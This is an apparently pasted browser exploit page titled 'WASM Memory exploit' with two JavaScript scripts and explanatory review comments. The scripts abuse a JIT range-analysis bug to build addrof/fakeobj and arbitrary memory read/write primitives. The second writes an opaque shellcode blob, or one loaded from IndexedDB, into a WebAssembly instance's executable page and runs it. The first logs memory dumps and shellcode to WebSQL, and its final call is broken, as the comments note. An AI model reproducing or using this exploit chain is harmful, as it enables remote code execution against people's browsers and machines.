xosski

WASM Memory exploit

Dec 28th, 2024
// Buffer the first script intends to fill with a payload and then "call" (see
// executeExploit).  NOTE(review): nothing in this script changes the page
// permissions of this allocation; it is an ordinary ArrayBuffer.
var executableBuffer = new ArrayBuffer(0x1000);
var dataView = new DataView(executableBuffer); // not referenced anywhere below

// 8-byte scratch area shared by ftoi()/itof(): f64_buf and u64_buf alias the
// same bytes, so a double written through one view can be read back as two
// 32-bit words through the other.  Despite its name u64_buf is a Uint32Array;
// ftoi() treats u64_buf[0] as the LOW word, i.e. this assumes a little-endian
// host.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
// 0x150-byte buffer whose backing-store pointer copy_shellcode() overwrites so
// that DataView writes to it land elsewhere.
let buf2 = new ArrayBuffer(0x150);
  8.  
/**
 * Open the WebSQL database used for logging and make sure both tables exist.
 *
 * NOTE(review): openDatabase() is the WebSQL API; recent Chromium releases no
 * longer expose it, in which case this throws ReferenceError — confirm for the
 * target build.
 *
 * @returns {Database} the opened database ('iu14D2N_SQL', 2 MiB quota) with
 *   `memory_dumps(addr TEXT, data TEXT)` and `shellcode(id TEXT, payload BLOB)`
 *   created if missing (asynchronously, inside one transaction).
 */
function initSQLDatabase() {
  const db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);

  const schema = [
    'CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)',
    'CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)',
  ];
  db.transaction((tx) => {
    for (const statement of schema) {
      tx.executeSql(statement);
    }
  });
  return db;
}
  18.  
/**
 * Reinterpret the 64 bits of a double as an unsigned BigInt.
 *
 * Goes through the shared f64_buf/u64_buf scratch pair, so it clobbers whatever
 * those views held.  u64_buf[0] is taken as the low word (little-endian host).
 *
 * @param {number} val double whose bit pattern is wanted.
 * @returns {bigint} the raw IEEE-754 bits, in 0n .. 2n**64n - 1n.
 */
function ftoi(val) {
  f64_buf[0] = val;
  const lo = BigInt(u64_buf[0]);
  const hi = BigInt(u64_buf[1]);
  return (hi << 32n) | lo;
}
  23.  
/**
 * Inverse of ftoi(): build the double whose bit pattern is `val`.
 *
 * Writes the two 32-bit halves into the shared u64_buf scratch view (low word
 * first) and reads the result back through f64_buf.  Halves wider than 32 bits
 * are truncated by the Uint32Array store, as in the original.
 *
 * @param {bigint} val 64-bit pattern to reinterpret.
 * @returns {number} the corresponding double.
 */
function itof(val) {
  const lo = val & 0xffffffffn;
  const hi = val >> 32n;
  u64_buf[0] = Number(lo);
  u64_buf[1] = Number(hi);
  return f64_buf[0];
}
  29.  
// One-element Uint32Array holding 2**31.  foo() reads it back through `^ 0`,
// which turns it into INT32_MIN — the seed for foo()'s arithmetic chain.
const _arr = new Uint32Array([2**31]);
  31.  
/**
 * Allocate the (arr, cor) pair that the rest of the script corrupts.
 *
 * Evaluated literally, x goes 2**31 -> (^0) -2147483648 -> +1 -> abs
 * 2147483647 -> -2147483647 = 0 -> max 0 -> -1 -> reset to 0, so
 * `new Array(0)` followed by shift() is just an empty array.  The point is the
 * shape, not the value: the function is called 0x3000 times at top level to
 * get it compiled, and the exploit presumably relies on the optimizing
 * compiler's range analysis mistyping x so that the `x == -1` guard is removed
 * and `new Array(x)` / shift() produces an array whose length disagrees with
 * its storage.  Which V8 build this targets is not stated on the page; on an
 * unaffected engine arr is simply empty.
 *
 * cor is allocated immediately after arr in program order; later code assumes
 * their element storage is adjacent in the heap (assumption, not shown here).
 *
 * @param {boolean} a unused.
 * @returns {[Array, number[]]} [arr, cor].
 */
function foo(a) {
  var x = 1;
  x = (_arr[0] ^ 0) + 1;
  x = Math.abs(x);
  x -= 2147483647;
  x = Math.max(x, 0);
  x -= 1;
  if(x==-1) x = 0;   // dead at runtime (x is -1 here); matters only to the JIT
  var arr = new Array(x);
  arr.shift();
  var cor = [1.1, 1.2, 1.3];
  return [arr, cor];
}
  45.  
/**
 * Perform `length` reads starting at `startAddr`, advancing one byte per read.
 *
 * Each arbread() returns 8 bytes, so successive entries overlap by 7 bytes
 * (and, because arbread() rounds even addresses up, pairs of entries repeat).
 *
 * @param {bigint} startAddr first address to read.
 * @param {number|bigint} length number of reads.
 * @returns {number[]} arbread() results coerced to numbers, in address order.
 */
function readMemoryRegion(startAddr, length) {
  const count = BigInt(length);
  const values = [];
  let offset = 0n;
  while (offset < count) {
    values.push(Number(arbread(startAddr + offset)));
    offset += 1n;
  }
  console.log("[+] Memory region read from", startAddr.toString(16));
  return values;
}
  54.  
/**
 * Read `size` bytes at `addr` as consecutive 8-byte values.
 *
 * @param {bigint} addr start address.
 * @param {number|bigint} size byte count; a trailing partial word is still read
 *   in full.
 * @returns {Array} the raw arbread() results (doubles), one per 8 bytes.
 */
function dumpMemoryRegion(addr, size) {
  const end = addr + BigInt(size);
  const words = [];
  let cursor = addr;
  while (cursor < end) {
    words.push(arbread(cursor));
    cursor += 8n;
  }
  console.log("[+] Memory dump at", addr.toString(16), ":", words);
  return words;
}
  64.  
/**
 * Dump a memory region (see dumpMemoryRegion) and persist it as one row of the
 * memory_dumps table.  The statement is parameterised, so addr/data never reach
 * the SQL text directly.
 *
 * @param {bigint} addr start address; stored as hex text.
 * @param {number|bigint} size byte count.
 * @param {Database} db database from initSQLDatabase().
 * @returns {Array} the dumped values (JSON.stringify of them is what is stored;
 *   it would throw for BigInt entries, but arbread() yields doubles).
 */
function dumpMemoryRegionToSQL(addr, size, db) {
  const words = dumpMemoryRegion(addr, size);
  const row = [addr.toString(16), JSON.stringify(words)];
  db.transaction((tx) => {
    tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)', row);
  });
  return words;
}
  73.  
/**
 * Insert `shellcode` into the shellcode table under the fixed id
 * 'iu14D2N_shellcode'.  Every call adds another row; nothing is upserted or
 * deleted.  Parameterised statement, no string-built SQL.
 *
 * @param {Database} db database from initSQLDatabase().
 * @param {*} shellcode value bound to the BLOB column as-is.
 */
function storeShellcode(db, shellcode) {
  const row = ['iu14D2N_shellcode', shellcode];
  db.transaction((tx) => {
    tx.executeSql('INSERT INTO shellcode (id, payload) VALUES (?, ?)', row);
  });
}
  80.  
// Warm-up: call foo() enough times for the JIT to optimise it (the effect the
// script is after only exists in optimised code; see foo()).  The argument is
// ignored.
for(var i=0;i<0x3000;++i)
  foo(true);

// One more call through the optimised code to obtain the corrupted `arr` and
// its neighbour `cor`.
var x = foo(false);
var arr = x[0];
var cor = x[1];

// Slot offset from arr's element 0 at which the script expects cor's storage:
// addrof()/fakeobj() treat arr[idx+1] and cor[0] as the same memory.  The value
// is specific to the target build.
const idx = 6;
// Out-of-bounds store 9 slots further on.  What this field is is not stated
// here; presumably a length word of a neighbouring object, since cor[3] is read
// past cor's three literal elements right afterwards.
arr[idx+10] = 0x4242;
  90.  
/**
 * Leak the address of object k.
 *
 * Stores k through the corrupted arr at arr[idx+1], which aliases cor[0], then
 * reads that slot back through the double array cor to get its raw bits; only
 * the low 32 bits are kept (presumably a pointer-compressed tagged address).
 * Only meaningful once arr is corrupted; on a sane arr cor[0] is still 1.1.
 *
 * @param {*} k object to locate.
 * @returns {bigint} low 32 bits of the slot.
 */
function addrof(k) {
  arr[idx+1] = k;
  return ftoi(cor[0]) & 0xffffffffn;
}
  95.  
/**
 * Inverse of addrof(): write the bit pattern k into cor[0] and read the same
 * memory back through arr, which hands it out as an object reference.
 * k must be a value the engine accepts as a tagged pointer (the callers pass an
 * odd 32-bit value from addrof() plus an offset).
 *
 * @param {bigint} k 64-bit pattern to place in the slot.
 * @returns {*} whatever arr[idx+1] now resolves to.
 */
function fakeobj(k) {
  cor[0] = itof(k);
  return arr[idx+1];
}
  100.  
// Raw bits one slot past cor's three literal elements (an out-of-bounds read
// that only works after the earlier corruption).  The script uses them as the
// map word of a packed-double JSArray — presumably the map of the object that
// follows cor's storage in the heap.
var float_array_map = ftoi(cor[3]);

// arr2's element storage doubles as the body of a counterfeit JSArray: slot 0
// supplies its map, slot 1 its elements-pointer/length pair (rewritten by
// arbread()/arbwrite()); 2.3 and 3.4 are padding.
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
// `fake` is a JS reference to that counterfeit array.  0x20 is the assumed
// distance, in the target build, from addrof(arr2) to the first double of
// arr2's element storage.
var fake = fakeobj(addrof(arr2) + 0x20n);
  105.  
/**
 * Read 8 bytes at `addr` via the counterfeit array `fake`.
 *
 * The low bit of addr is forced on (tagged-pointer convention), then arr2[1] —
 * fake's elements/length slot — receives elements = addr - 8 in the low 32
 * bits and length = 2 in the high 32, so fake[0] is served from `addr` itself
 * (the 8 skipped bytes presumably being the element store's own header).
 * Because even addresses are rounded up, reads at 2k and 2k+1 return the same
 * bytes.  addr must fit in 32 bits or it collides with the length half.
 *
 * @param {bigint} addr address to read (as returned by addrof()).
 * @returns {number} the 8 bytes as a double; convert with ftoi().
 */
function arbread(addr) {
  if (addr % 2n == 0) {
    addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  return (fake[0]);
}
  113.  
/**
 * Write the 64-bit pattern `val` to `addr`, the mirror image of arbread():
 * point fake's element storage at addr - 8 (low bit forced on, length 2) and
 * store through fake[0].  Same rounding caveat: an even addr is written at
 * addr + 1's rounding target, i.e. the same place as addr + 1.
 *
 * @param {bigint} addr destination address (32-bit).
 * @param {bigint|number} val 8 bytes to write, as an integer.
 */
function arbwrite(addr, val) {
  if (addr % 2n == 0) {
    addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  fake[0] = itof(BigInt(val));
}
  121.  
/**
 * Copy a list of 32-bit words to `addr` by redirecting buf2's backing store.
 *
 * A DataView over buf2 is created first; then the 8-byte field at
 * addrof(buf2) + 0x14 — assumed to be the ArrayBuffer's backing-store pointer
 * in the target build — is overwritten with `addr`, and each entry is written
 * as a little-endian uint32 at offset 4*i.  Whether a DataView created before
 * the overwrite observes the new backing store is engine-specific; the script
 * assumes it does.  No bounds check: shellcode.length * 4 must stay within
 * buf2's 0x150 bytes or setUint32 throws RangeError.
 *
 * @param {bigint} addr destination address.
 * @param {number[]} shellcode words to write; values shorter than 32 bits are
 *   zero-padded to 4 bytes.
 */
function copy_shellcode(addr, shellcode) {
  let dataview = new DataView(buf2);
  let buf_addr = addrof(buf2);
  let backing_store_addr = buf_addr + 0x14n;
  arbwrite(backing_store_addr, addr);

  for (let i = 0; i < shellcode.length; i++) {
    dataview.setUint32(4*i, shellcode[i], true);
  }
}
  132.  
/**
 * First script's entry point: dump 0x100 bytes at executableBuffer + 0x20 into
 * WebSQL, write a short word list there, and try to "call" that address.
 *
 * NOTE(review): as written this cannot reach code execution, and the page gives
 * no evidence it was run:
 *  - `new Function('return ' + exec_addr)()` evaluates source text such as
 *    `return 12345n` and returns that BigInt, so execFunc is a bigint and
 *    `execFunc()` throws TypeError.  JavaScript has no way to transfer control
 *    to a raw address; the second script instead calls a WebAssembly export.
 *  - executableBuffer is a plain ArrayBuffer; nothing here makes its memory
 *    executable, and the 0x20 offset to its data is an unverified assumption.
 *  - The `shellcode` entries range from one to four bytes wide but each is
 *    written as a full little-endian uint32 by copy_shellcode(), so the short
 *    ones are zero-padded and the bytes laid down are not one contiguous
 *    instruction stream.
 *  - `async` without any await: the WebSQL transactions are only queued when
 *    this returns.
 * Side effects: one row in memory_dumps, one in shellcode, console output.
 */
async function executeExploit() {
  let db = initSQLDatabase();
  var exec_addr = addrof(executableBuffer) + 0x20n;
  console.log("[+] Address of executable region: " + exec_addr.toString(16));

  dumpMemoryRegionToSQL(exec_addr, 0x100, db);

  // Mixed-width values; see the note above.
  let shellcode = [
    0x90909090,
    0x68434241,
    0x6A00,
    0xB8,
    0x89E5,
    0x31C0,
    0x50,
    0x89E2,
    0x31C9,
    0xB0FF,
    0xC3
  ];

  storeShellcode(db, shellcode);
  copy_shellcode(exec_addr, shellcode);

  // Yields the BigInt exec_addr, not a function; the call below throws.
  let execFunc = new Function('return ' + exec_addr)();
  execFunc();
}
  160.  
/**
 * Wrapper around executeExploit() that brackets it with progress output.
 * Rejections from executeExploit() propagate unchanged (the final log line is
 * then skipped).
 *
 * @returns {Promise<void>}
 */
async function executeCustomExploit() {
  console.log("[+] Starting iu14D2N exploit with SQL capabilities...");
  const run = executeExploit();
  await run;
  console.log("[+] Exploit and SQL operations completed");
}
  166.  
// Kick off the first script; a rejection is logged and otherwise ignored.
executeCustomExploit().catch(function (error) {
  console.log("[!] Exploit failed:", error);
});
///////// Second, stand-alone script (WebAssembly RWX-page variant). It re-declares buf2, _arr and idx with let/const, so it cannot be concatenated with the script above into one file (SyntaxError); load it on its own. /////////
// Minimal WebAssembly module, spelled out section by section.  It exports one
// function, `main`, whose whole body is `i32.const 42; end`, plus one memory.
// The exploit does not care what main does; it only needs the engine to
// JIT-compile a wasm function so that its code lives in a writable+executable
// mapping (an assumption about the target build).
var wasm_code = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d,              // "\0asm" magic
  0x01, 0x00, 0x00, 0x00,              // version 1
  0x01, 0x85, 0x80, 0x80, 0x80, 0x00,  // type section, size 5 (padded LEB128)
  0x01, 0x60, 0x00, 0x01, 0x7f,        //   1 type: () -> i32
  0x03, 0x82, 0x80, 0x80, 0x80, 0x00,  // function section, size 2
  0x01, 0x00,                          //   1 function of type 0
  0x04, 0x84, 0x80, 0x80, 0x80, 0x00,  // table section, size 4
  0x01, 0x70, 0x00, 0x00,              //   1 table: funcref, min 0
  0x05, 0x83, 0x80, 0x80, 0x80, 0x00,  // memory section, size 3
  0x01, 0x00, 0x01,                    //   1 memory: min 1 page
  0x06, 0x81, 0x80, 0x80, 0x80, 0x00,  // global section, size 1
  0x00,                                //   0 globals
  0x07, 0x91, 0x80, 0x80, 0x80, 0x00,  // export section, size 17
  0x02,                                //   2 exports
  0x06, 0x6d, 0x65, 0x6d, 0x6f, 0x72, 0x79, 0x02, 0x00, //   "memory" -> memory 0
  0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00,             //   "main"   -> func 0
  0x0a, 0x8a, 0x80, 0x80, 0x80, 0x00,  // code section, size 10
  0x01,                                //   1 body
  0x84, 0x80, 0x80, 0x80, 0x00,        //   body size 4
  0x00,                                //   no local declarations
  0x41, 0x2a,                          //   i32.const 42
  0x0b,                                //   end
]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
  175.  
// Scratch pair for ftoi()/itof(), identical to the first script's: both views
// alias the same 8 bytes, u64_buf is a Uint32Array (two halves, [0] = low word,
// i.e. little-endian host).
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
// Buffer whose backing-store pointer copy_shellcode() overwrites.
// NOTE(review): this `let` (and `const _arr` / `const idx` below) re-declares a
// binding of the first script, so the two halves of this page are separate
// scripts — loaded as one they fail to parse.
let buf2 = new ArrayBuffer(0x150);
  180.  
/**
 * Return the 64-bit pattern of a double as an unsigned BigInt.
 *
 * Writes through the shared f64_buf view and reads the two 32-bit halves back
 * from u64_buf (index 0 = low word, so this assumes a little-endian host).
 * Clobbers the shared scratch buffer.
 *
 * @param {number} val double to reinterpret.
 * @returns {bigint} raw IEEE-754 bits.
 */
function ftoi(val) {
  f64_buf[0] = val;
  const [lo, hi] = u64_buf;
  return BigInt(lo) + (BigInt(hi) << 32n);
}
  185.  
/**
 * Return the double whose 64-bit pattern is `val` (inverse of ftoi()).
 *
 * Both halves go into the shared u64_buf in one set() call — low word first —
 * and the double is read back through f64_buf.  Over-wide halves are truncated
 * by the Uint32Array store.
 *
 * @param {bigint} val bit pattern.
 * @returns {number} the double.
 */
function itof(val) {
  u64_buf.set([Number(val & 0xffffffffn), Number(val >> 32n)]);
  return f64_buf[0];
}
  191.  
// One-element Uint32Array holding 2**31; foo() turns it into INT32_MIN via
// `^ 0` to seed its arithmetic chain.
const _arr = new Uint32Array([2**31]);
  193.  
/**
 * Allocate the (arr, cor) pair the rest of the script corrupts.
 *
 * Taken literally, x is 2**31 -> (^0) -2147483648 -> +1 -> abs 2147483647 ->
 * -2147483647 = 0 -> max 0 -> -1 -> reset to 0, so `new Array(0)` + shift() is
 * an empty array and nothing odd happens.  The shape is what matters: the
 * function is called 0x3000 times at top level to get it optimised, and the
 * exploit presumably relies on the optimising compiler's range analysis
 * mistyping x, dropping the `x == -1` guard, and `new Array(x)` / shift()
 * leaving an array whose length disagrees with its storage.  The V8 build
 * this targets is not named on the page; on an unaffected engine arr is empty.
 *
 * cor is allocated right after arr in program order; later code assumes their
 * element storage is adjacent in the heap (assumption, not demonstrated here).
 *
 * @param {boolean} a unused.
 * @returns {[Array, number[]]} [arr, cor].
 */
function foo(a) {
  var x = 1;
  x = (_arr[0] ^ 0) + 1;
  x = Math.abs(x);
  x -= 2147483647;
  x = Math.max(x, 0);
  x -= 1;
  if(x==-1) x = 0;   // always taken at runtime; only the JIT's view of it matters
  var arr = new Array(x);
  arr.shift();
  var cor = [1.1, 1.2, 1.3];
  return [arr, cor];
}
  207.  
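/**
 * Load a previously stored payload from IndexedDB.
 *
 * Opens `dbName` at version 1, creating the object store `tableName` (keyed by
 * `id`) if the open triggers an upgrade, then reads the record whose key is
 * the literal string "shellcode".
 *
 * @param {string} dbName IndexedDB database name.
 * @param {string} tableName object store to read from.
 * @returns {Promise<*>} the record's `data` property, or null when no record
 *   with key "shellcode" exists.
 * @rejects when the database cannot be opened, when the object store does not
 *   exist (a version-1 database that pre-dates the store gets no upgrade event,
 *   so db.transaction() throws NotFoundError), or when the read itself fails.
 *   The previous version let those last two cases escape the event handlers,
 *   leaving the promise pending forever; it also never closed the connection.
 */
async function loadShellcodeFromDB(dbName, tableName) {
  return new Promise((resolve, reject) => {
    const request = indexedDB.open(dbName, 1);

    request.onupgradeneeded = (event) => {
      const db = event.target.result;
      if (!db.objectStoreNames.contains(tableName)) {
        db.createObjectStore(tableName, { keyPath: 'id' });
      }
    };

    request.onerror = () => reject(request.error);
    request.onsuccess = () => {
      const db = request.result;
      let getRequest;
      try {
        // Throws synchronously if the store is missing; without this guard the
        // error is lost inside the event handler and nothing settles.
        const transaction = db.transaction(tableName, "readonly");
        getRequest = transaction.objectStore(tableName).get("shellcode");
      } catch (err) {
        db.close();
        reject(err);
        return;
      }

      getRequest.onerror = () => {
        db.close();
        reject(getRequest.error);
      };
      getRequest.onsuccess = () => {
        db.close();
        resolve(getRequest.result ? getRequest.result.data : null);
      };
    };
  });
}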
  236.  
// Warm-up: call foo() enough times for the JIT to optimise it (see foo(); the
// effect only exists in optimised code).  The argument is ignored.
for(var i=0;i<0x3000;++i)
  foo(true);

// One call through the optimised code to get the corrupted `arr` and its
// neighbour `cor`.
var x = foo(false);
var arr = x[0];
var cor = x[1];

// Slot offset from arr's element 0 at which cor's storage is expected:
// addrof()/fakeobj() use arr[idx+1] and cor[0] as the same memory.  Value is
// specific to the target build.
const idx = 6;
// Out-of-bounds store 9 slots further on; the field's identity is not stated
// here (presumably a length word of a neighbouring object — cor[3] is read
// past cor's three literal elements right afterwards).
arr[idx+10] = 0x4242;
  246.  
/**
 * Leak the address of object k: store it at arr[idx+1] (aliasing cor[0]
 * through the corrupted arr), read the raw bits back via cor, keep the low
 * 32 bits (presumably a pointer-compressed tagged address).  Meaningless
 * until arr is corrupted; on a sane arr cor[0] is still 1.1.
 *
 * @param {*} k object to locate.
 * @returns {bigint} low 32 bits of the slot.
 */
function addrof(k) {
  arr[idx+1] = k;
  return ftoi(cor[0]) & 0xffffffffn;
}
  251.  
/**
 * Inverse of addrof(): put the bit pattern k into cor[0] and read the same slot
 * back through arr, which returns it as an object reference.  Callers pass an
 * odd 32-bit value derived from addrof().
 *
 * @param {bigint} k pattern to place in the slot.
 * @returns {*} whatever arr[idx+1] resolves to.
 */
function fakeobj(k) {
  cor[0] = itof(k);
  return arr[idx+1];
}
  256.  
// Raw bits one slot past cor's three literal elements (only reachable after
// the earlier corruption); used as the map word of a packed-double JSArray —
// presumably the map of the object following cor's storage.
var float_array_map = ftoi(cor[3]);

// arr2's element storage is the body of a counterfeit JSArray: slot 0 is its
// map, slot 1 its elements-pointer/length pair (rewritten by arbread() and
// arbwrite()); the last two doubles are padding.
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
// JS reference to the counterfeit.  0x20 is the assumed distance, in the
// target build, from addrof(arr2) to the first double of its element storage.
var fake = fakeobj(addrof(arr2) + 0x20n);
  261.  
/**
 * Read 8 bytes at `addr` through the counterfeit array `fake`.
 *
 * Forces the low bit of addr on (tagged-pointer convention), then stores
 * elements = addr - 8 (low 32 bits) and length = 2 (high 32 bits) into arr2[1],
 * fake's elements/length slot, so fake[0] is served from `addr` (the 8 skipped
 * bytes presumably being the element store's header).  Even addresses are
 * rounded up, so addr and addr + 1 read the same bytes; addr must fit in 32
 * bits or it overlaps the length half.
 *
 * @param {bigint} addr address (as returned by addrof()).
 * @returns {number} the 8 bytes as a double; convert with ftoi().
 */
function arbread(addr) {
  if (addr % 2n == 0) {
    addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  return (fake[0]);
}
  269.  
/**
 * Write the 64-bit pattern `val` at `addr`; mirror of arbread().  Points fake's
 * element storage at addr - 8 (low bit forced on, length 2) and stores through
 * fake[0].  Same rounding caveat as arbread(): an even addr is written at the
 * same place as addr + 1.
 *
 * @param {bigint} addr destination (32-bit).
 * @param {bigint|number} val 8 bytes to write, as an integer.
 */
function arbwrite(addr, val) {
  if (addr % 2n == 0) {
    addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  fake[0] = itof(BigInt(val));
}
  277.  
/**
 * Copy a list of 32-bit words to `addr` by redirecting buf2's backing store.
 *
 * Creates a DataView over buf2, overwrites the 8 bytes at addrof(buf2) + 0x14
 * (assumed to be the ArrayBuffer's backing-store pointer in the target build)
 * with `addr`, then writes each entry as a little-endian uint32 at 4*i.
 * Whether a DataView created before the overwrite follows the new backing
 * store is engine-specific; the script assumes so.  No bounds check:
 * shellcode.length * 4 must not exceed buf2's 0x150 bytes or setUint32 throws
 * RangeError (the 66-entry fallback in executeExploit needs 264 bytes).
 *
 * @param {bigint} addr destination address.
 * @param {number[]} shellcode words to write.
 */
function copy_shellcode(addr, shellcode) {
  let dataview = new DataView(buf2);
  let buf_addr = addrof(buf2);
  let backing_store_addr = buf_addr + 0x14n;
  arbwrite(backing_store_addr, addr);

  for (let i = 0; i < shellcode.length; i++) {
    dataview.setUint32(4*i, shellcode[i], true);
  }
}
  288.  
/**
 * Second script's entry point.
 *
 * Reads the 8-byte field at wasm_instance + 0x68 — assumed, for the target
 * build, to be the pointer to the instance's JIT-compiled code (an RWX
 * mapping) — copies a word list there, then calls the exported `main`, whose
 * machine code is presumed to live at that address.  The payload comes from
 * IndexedDB ("exploitDB" / "payloads", key "shellcode") when present,
 * otherwise from the inline 66-word blob (264 bytes, within buf2's 0x150).
 * What the inline blob does is not stated on the page.
 *
 * NOTE(review): the 0x68 offset and the meaning of that field are
 * build-specific assumptions; on another build the read yields an arbitrary
 * value and copy_shellcode()'s arbwrite lands wherever it points.  If the
 * IndexedDB read never settles (missing store or read error are not handled
 * there) this function stops before copy_shellcode().
 */
async function executeExploit() {
  var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
  console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));

  let shellcode = await loadShellcodeFromDB("exploitDB", "payloads");
  if (!shellcode) {
    // Opaque fallback payload; not decoded here.
    shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
  }

  copy_shellcode(rwx_page_addr, shellcode);
  f();
}
  301.  
// Kick off the second script; a rejection (e.g. a failed IndexedDB open) is
// only logged.
executeExploit().catch((err) => console.error(err));